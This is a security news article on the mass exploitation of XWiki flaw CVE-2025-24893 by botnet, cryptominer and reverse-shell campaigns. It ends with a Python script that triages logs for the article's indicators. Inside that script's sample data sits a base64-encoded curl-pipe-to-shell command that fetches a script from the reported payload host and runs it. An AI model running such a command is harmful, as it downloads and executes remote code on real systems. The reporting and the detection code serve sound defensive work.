Hackers Weaponize XWiki Flaw to Build and Rent Out Botnet Networks


Cybersecurity researchers have observed a dramatic escalation in attacks exploiting a critical XWiki vulnerability, with multiple threat actors now leveraging CVE-2025-24893 to deploy botnets, cryptocurrency miners, and custom malware toolkits.

The vulnerability, initially detected by VulnCheck’s Canary Intelligence system on October 28, 2025, has rapidly evolved from a single attacker’s exploit into a widespread multi-actor campaign.

Within two days of VulnCheck’s disclosure, the flaw was added to CISA’s Known Exploited Vulnerabilities catalog on October 30, triggering an immediate surge in exploitation attempts.

Security analysts have identified numerous distinct attack groups targeting the XWiki flaw. The RondoDox botnet emerged as one of the most aggressive actors, launching its first attacks on November 3, 2025.

CVE ID:             CVE-2025-24893
Vulnerability Type: Unauthenticated Command Injection and Remote Code Execution (RCE)
First Exploited:    October 28, 2025
Added to CISA KEV:  October 30, 2025

The botnet’s activity is easily recognizable through its characteristic HTTP User-Agent signatures and payload naming conventions, with secondary payloads typically following the “rondo..sh” pattern.

Beyond botnets, cryptocurrency mining operations have heavily exploited the vulnerability. Multiple campaigns have been observed downloading obfuscated payloads that ultimately execute coin mining software on compromised systems.

One particularly sophisticated attack chain involved base64-encoded payloads delivered via domains like ospwrf10ny.anondns[.]net, demonstrating attackers’ efforts to evade detection mechanisms.

Advanced Attack Techniques

Threat actors have employed various exploitation methods, including the deployment of reverse shells for direct system access.

Researchers documented attempts from both cloud infrastructure and potentially compromised devices.

Notably, one reverse shell attack originated from an IP address exposing QNAP and DrayTek interfaces, suggesting the source itself may have been previously exploited through separate vulnerabilities.

The vulnerability has also attracted significant scanner activity, with both automated tools like Nuclei and custom OAST-based scanners probing internet-facing XWiki servers.

This scanning behavior indicates attackers are actively building comprehensive target lists for future exploitation waves.

The rapid progression from initial exploitation to widespread adoption highlights a critical challenge for defenders. By the time CVE-2025-24893 appeared in official vulnerability catalogs, attackers had already gained significant operational advantages.

The expanding infrastructure supporting these attacks, including multiple payload hosting servers and diverse command-and-control networks, demonstrates sophisticated coordination among threat actors.

VulnCheck’s early detection capabilities provided crucial lead time before exploitation became widespread.

The security firm tracked attacks from numerous IP addresses across different countries, revealing a truly global threat landscape spanning multiple continents.

Organizations running XWiki installations should immediately apply available patches and review their systems for indicators of compromise.

Security teams are advised to monitor for unusual network connections, unexpected cryptocurrency mining processes, and suspicious reverse shell attempts targeting vulnerable servers. Regular security audits are strongly recommended.
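As an added illustration (not code from the article, VulnCheck, or XWiki), the script below triages web-server access logs for the indicators the article names: rondo*.sh payload names, the anondns[.]net payload host, base64-encoded command payloads, and Nuclei scans. It assumes the combined log format, XWiki served under the standard /xwiki/ path prefix, and uses constructed sample lines with documentation-range IPs.

```python
import base64
import re
from urllib.parse import unquote, urlsplit
# Indicators from the article: rondo*.sh payload names, the anondns.net payload host
# (defanged as anondns[.]net there), base64 command payloads, Nuclei scans (its default UA names the tool).
RONDO_RE = re.compile(r"\brondo[\w.-]*\.sh\b", re.I)
HOST_RE = re.compile(r"\banondns\.net\b", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
SHELL_RE = re.compile(r"\b(curl|wget|sh|bash|chmod)\b")
# Apache/nginx combined log format, one request per line (assumed log layout).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')

def decoded_base64_blobs(text):
    """Yield printable ASCII decodings of base64-looking runs in text."""
    for blob in B64_RE.findall(text):
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if raw.isascii() and raw.decode("ascii").isprintable():
            yield raw.decode("ascii")

def triage_line(line):
    """Return the indicator names that one XWiki access-log line trips."""
    m = LOG_RE.match(line)
    url = unquote(m["url"]) if m else ""
    if not urlsplit(url).path.startswith("/xwiki/"):
        return []
    reasons = []
    if RONDO_RE.search(url):
        reasons.append("rondo*.sh payload name in request")
    if HOST_RE.search(url):
        reasons.append("known payload host in request")
    for text in decoded_base64_blobs(urlsplit(url).query):
        if SHELL_RE.search(text):  # decoded blob is a shell download/run command
            reasons.append("base64-encoded shell stager: " + text[:48])
            break
    if "nuclei" in m["ua"].lower():
        reasons.append("Nuclei scanner User-Agent")
    return reasons

# Constructed sample lines (IPs from the 203.0.113.0/24 documentation range).
STAGER = base64.b64encode(b"curl -s http://ospwrf10ny.anondns.net/rondo.sample.sh | sh").decode()
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Nov/2025:10:00:01 +0000] "GET /xwiki/bin/view/Main/?q=rondo.sample.sh HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    f'203.0.113.6 - - [03/Nov/2025:10:00:02 +0000] "GET /xwiki/bin/get/Main/?cmd={STAGER} HTTP/1.1" 200 512 "-" "curl/8.0"',
    '203.0.113.7 - - [03/Nov/2025:10:00:03 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 512 "-" "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"',
    '203.0.113.8 - - [03/Nov/2025:10:00:04 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
```

Run `triage_line` over each line of a real log; the fourth constructed line is an ordinary page view and trips nothing, which is the baseline a tuned rule set must keep quiet.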

The CVE-2025-24893 exploitation campaign serves as another reminder that attackers often move faster than traditional disclosure timelines, making early threat detection systems essential for modern defense strategies.
